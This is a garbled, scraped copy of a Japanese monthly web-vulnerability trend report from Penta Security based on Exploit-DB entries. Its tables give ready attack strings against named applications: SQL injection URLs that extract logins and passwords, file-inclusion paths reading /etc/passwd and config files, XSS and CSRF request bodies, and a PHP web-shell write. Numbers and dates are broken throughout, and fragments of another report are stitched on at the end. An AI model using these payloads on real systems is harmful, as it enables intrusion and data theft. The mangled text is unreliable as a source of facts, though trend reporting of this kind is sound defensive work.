itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

Size: px

Start display at page:

Download "itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E"

ふみなふじた
7 years ago
Views:

1 04.0

2 itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 EDB-Report 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&Dセンターデータセキュリティチーム 04 年月は Exploit-DBより公開されている脆の中 SQL Injection クロスサイト要求偽造 (Cross Site Request Forgery:CSRF) ローカルファイル挿入 (Local File Inclusion:LFI)のような代表的な攻撃が多く見られた月です攻撃実行の難易度は易と判断されるパターンが多いものの危険度は高と分類されるパターンが69% 早急対応要と分類されるパターンが6% 見られ簡単に実行できる攻撃パターンでクリティカルな被害を及ぼす可能性があるため管理者は格別な注意を払う必要があります主なソフトウェア別脆ではの脆が多く報告されているため同ソフトウェアを利用しているお客様は報告されている脆に対応可能な最新バージョンでパッチをし対応することを推奨致します. 脆別件数脆カテゴリ件数 SQLインジェクション (SQL Injection) 7 ローカルファイル挿入 (Local File Inclusion:LFI) 9 クロスサイト要求偽造 (Cross Site Request Forgery:CSRF) 7 クロスサイトスクリプティング 5 (Cross Site Scripting:XSS) クッキー偽造 (Cookie Poisoning) 合計脆別件数 7 5. 危険度別件数危険度件数割合早急対応要 0 6% 高 7 69% 中 5% 合計 39 00% 危険度別件数 0 早急対応要高中 7 3. 攻撃実行の難易度別件数難易度件数割合難 0 6% 中 7 69% 易 5% 合計 39 00% 攻撃実行の難易度別件数 0 7 難中易 4. 主なソフトウェア別脆発生件数ソフトウェア名 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 合計件数主なソフトウェア別脆発生件数 3 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 :システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数の脆を突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する Copyright 04 Penta Security Systems Inc. All rights reserved

ローカルファイル挿入 (Local File Inclusion:LFI)のような代表的な攻撃が多く見られた月です攻撃実行の難易度は易と判断されるパターンが多いものの危険度は高と分類されるパターンが69% 早急対応要と分類されるパターンが6% 見られ簡単に実行できる攻撃

3 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報です ** 5 件以上発生した主なソフトウェア別脆の詳細情報 EDB 番号脆カテゴリ攻撃難易度危険度脆名ソフトウェア名 3093 SQL 中高 Event Calendar - load-calendar.php SQL 3093 CSRF 易高 Event Calendar - load-calendar.php SQL 309 XSS 易高 Car Rental Script - index.php XSS 脆 309 CSRF 易高 Appointment Scheduler.0 - index.php CSRF 脆 309 LFI 易高 Appointment Scheduler.0 - index.php LFI 脆 3090 CSRF 易高 Appointment Scheduler.0 - index.php CSRF 脆 CSRF 易高 Rental Script - index.php CSRF 脆 LFI 易高 Rental Script - index.php LFI 脆 LFI 易高 Hotel System - index.php LFI 脆 CSRF 易高 Hotel System - index.php CSRF 脆 CSRF 易高 Packages Listing - index.php CSRF 脆 LFI 易高 Packages Listing - index.php LFI 脆 CSRF 易高 Pet Listing Script - index.php CSRF 脆 Copyright 04 Penta Security Systems Inc. All rights reserved

php SQL 3093 CSRF 易高 Event Calendar - load-calendar.php SQL 309 XSS 易高 Car Rental Script - index.php XSS 脆 309 CSRF 易高 Appointment Scheduler.0 - index.php CSRF 脆 309 LFI 易高 Appointment Scheduler.

4 日付 EDB 番号脆カテゴリ攻撃難易度危険度脆名攻撃コード対象プログラム対象環境 04// SQL Injection 易早急対応要 Taboada Macronews news_group.php SQL EDB-Report 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報です /news_popup.php?id='%0union%0all%0s ELECT%0,,3,concat('a','b','c')--%0 Taboada Macronews Taboada Macronews V.0 04// SQL Injection 易早急対応要 Cubic CMS agent.php SQL /agent.php?resource_id=- OR 'foobar' UNION SELECT user()-- cms 04// LFI 易高 04// SQL Injection 易早急対応要 04// XSS 易中 04// LFI 易高 04// SQL Injection 易早急対応要 Cubic CMS agent.php LFI 脆 Middle School Page - View.php SQL Middle School Page - View.php XSS 脆弱性 Horizon QCMS - d- load.php LFI 脆 Horizon QCMS - download.php SQL /agent.php?path=/../../application/config/project.ini /view.php?class=null+and+=+union+select+,concat(name,0x3a,pass)+from+teachinfo /view.php?class=<script>alert(document.cookie) ;</script> /d-load.php?start=../../config.php /download.php?category=%7%0union%0sel ect%0,,version(),4,5,6%0--%0 Middle School Page Middle School Page cms Middle School Page.3 Beta Middle School Page.3 Beta Horizon QCMS Horizon QCMS 4.0 Horizon QCMS Horizon QCMS // Cookie Poisoning 04// SQL Injection 中高 04// CSRF 易高 04//4 309 XSS 易高易高.8. - login.php SQL Event Calendar - loadcalendar.php SQL Injection 脆 Event Calendar - loadcalendar.php SQL Injection 脆 Car Rental Script - index.php XSS 脆 GET /login.php HTTP/. Cookie: burden_user_rememberme=; /loadcalendar.php?view=&month=6&year=03&cid =+and+substring(@@version,,)=4 /index.php?controller=adminevents&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 event_create=&category_id=&event_title=<sc ript>alert(document.cookie);</script>&event_de scription=&event_max_people=&event_colo r=ffcc00&start[]= :00&end[]= :00&title[]=Regular price&price[]=888&repeat_every=&repeat_ends =04-0- /index.php?controller=admins&action=in dex&p_date=<script>alert(document.cookie);</ script>.8. Event Calendar.0 Event Calendar.0 Car Rental Script 04//4 309 CSRF 易高 Appointment Scheduler.0 - index.php CSRF 脆 /index.php?controller=pjadminservices&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Appointmen t Scheduler.0 service_create=&i8n[][name]=<script>alert( document.cookie);</script>&i8n[][description ]=Iphobos Blog&price=00&length=&before=&after=&t otal=3&is_active= 04//4 309 LFI 易高 Appointment Scheduler.0 - index.php LFI 脆 Download&id=../../../../../app/config/db.inc.php Appointmen t Scheduler.0 Copyright 04 Penta Security Systems Inc. All rights reserved

0 04//7 30790 SQL Injection 易早急対応要 Cubic CMS agent.php

5 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報です日付 EDB 番号脆カテゴリ攻撃難易度危険度脆名攻撃コード対象プログラム対象環境 04// CSRF 易高 Job Listing Script - index.php CSRF 脆 /index.php?controller=admincategories&action= create HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Job Listing Script category_create=iphobos Blog&category_title=<script>alert(document.coo kie);</script> 04// CSRF 易高 Rental Script - index.php CSRF 脆 /index.php?controller=pjadminfeatures&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Rental Script 3.0 feature_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04// LFI 易高 04// LFI 易高 Rental Script - index.php LFI 脆 Hotel System - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Download&id=../../../../../../../../etc/passwd Rental Script 3.0 Hotel System // CSRF 易高 Hotel System - index.php CSRF 脆 /index.php?controller=pjadminrooms&action=pj ActionCreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Hotel System 3.0 room_create=&i8n[][name]=<script>alert(d ocument.cookie);</script>&i8n[3][name]=&i8 n[][name]=&i8n[][description]=iphobos&i8 n[3][description]=&i8n[][description]=&adults =&children=0&cnt= 04// CSRF 易高 Packages Listing - index.php CSRF 脆 /index.php?controller=pjadmincountries&action =pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Packages Listing.0 country_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04// LFI 易高 Packages Listing - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Packages Listing.0 Copyright 04 Penta Security Systems Inc. All rights reserved

CSRF 脆 /index.php?controller=admincategories&action= create HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.

6 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報です日付 EDB 番号脆カテゴリ攻撃難易度危険度脆名攻撃コード対象プログラム対象環境 04// CSRF 易高 Pet Listing Script - index.php CSRF 脆 /index.php?controller=adminbreeds&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Pet Listing Script.0 breed_create=&breed_title=<script>alert(docu ment.cookie);</script>&type_id= 04// SQL Injection 難早急対応要. - managetimetracker.php SQL /managetimetracker.php?action=projectpdf&id= %0and(select%0%0from(select%0count( *),concat((select%0(select%0(select%0dis tinct%0concat(0x7e,0x7,cast(schema_name% 0as%0char),0x7,0x7e)%0FROM%0inform ation_schema.schemata%0limit 0,))%0from%0information_schema.tables% 0limit 0,),floor(rand(0)*))x%0from%0information _schema.tables%0group%0by%0x)a)%0an d%0=. 04// SQL Injection 中早急対応要 <= v indexdate.php SQL /indexdate.php?ids=77%0union%0select% 0,,3,loginUtilisateur,5,6,passUtilisateur,8,9, 0,,,3,4,5%0from%0domphp_utilisate urs--%0 <= v //7 305 SQL Injection 易早急対応要 index.php SQL Injection 脆 /index.php?login=true HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 bloofox CMS login=login&password=iphobos&username= %0or%0=--%0 04//7 305 LFI 易高 index.php LFI 脆 /index.php?mode=settings&page=editor HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 bloofox CMS file=<?php%0system($_get[cmd]);%0?>$fil eurl=languages/deutsch.php&fileurl=../language s/deutsch.php$send=save 04// LFI 易高 <= v index.php LFI 脆 /index.php?urlancien=&url=../../ <= v // XSS 易高 - index.php XSS 脆 /index.php?action=showprofile&profile=<script> alert('dr.nano')</script> 04//3 346 XSS 易中 errmsg.php XSS 脆 /errmsg.php?msg=%3c%fp%3e%3cscript%3e alert%8%7xss%7%9%3b%3c%fscript% 3E%3Cp%3E //3 346 SQL Injection 易早急対応要 04//3 344 SQL Injection 易高 user.php /user.php?pcid=%0or%0=--%0 SQL myseatxt /autocomplete_res.php?term=99%7%0or%0 autocomplete_res.php SQL =--%0 myseatxt myseatxt //3 343 SQL Injection 易高 PizzaInn_Project - reserveexec.php SQL Injection 脆 /reserve-exec.php?id=%7%0or%0=-- %0 PizzaInn_Proj ect PizzaInn_Pr oject Copyright 04 Penta Security Systems Inc. All rights reserved

CSRF 脆 /index.php?controller=adminbreeds&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Pet Listing Script.

7 最新 Web 脆トレンドレポート(04.0) ~ Exploit-DB( 公開されている内容に基づいた脆トレンド情報です日付 EDB 番号脆カテゴリ攻撃難易度危険度脆名攻撃コード対象プログラム対象環境 04//3 34 SQL Injection 易早急対応要 Simple e-document.3 - login.php SQL Injection 脆 /login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 Simple e- document Simple e- document.3 username=- 473%7+OR+%8708%3D708%9%3&pa ssword=&op=login&submit=login 04//3 34 SQL Injection 易高 godontologico 5 - index_ajax.php SQL /index_ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 godontologico 5 godontologi co 5 usuario=%0or%0=&senha=%70%6%73 %73&login=%4C%6F%67%69%6E 04//3 340 SQL Injection 易高 itechclassifieds Change .php SQL /Change .php?PreviewNum=%7union% 0select%0null,null--%0 itechclassifie ds itechclassif ieds //3 340 SQL Injection 易高 itechclassifieds ViewCat.php SQL Injection 脆 /ViewCat.php?CatID=%0or%0=--%0 itechclassifie ds itechclassif ieds //4 375 SQL Injection 難早急対応要 Joomla JV Comment Extension index.php SQL Injection 脆 /index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/ Safari/535.7 option=com_jvcomment&task=comment.like&id =%0AND%0=(select%0min(@a:=)from %0(select%0%0union%0select%0)k% 0group%0by%0(select%0concat(@@version, 0x0,@a:=(@a+)%))) Joomla JV Comment Extension Joomla JV Comment Extension //4 373 LFI 易高..3 - index.php LFI 脆 /index.php?action=view&script=%f..%f..%fe tc/passwd..3 04//4 373 XSS 易高..3 - session.php XSS 脆 /session.php?<script>alert(%7xss%7)</scrip t>..3 04//4 37 SQL Injection 易高..3 - redirect.php SQL /redirect.php?action=url&goto=%0or%0= --%0 XOS XOS Shop.0 rc7o Copyright 04 Penta Security Systems Inc. All rights reserved

php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Simple e- document Simple e- document.

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです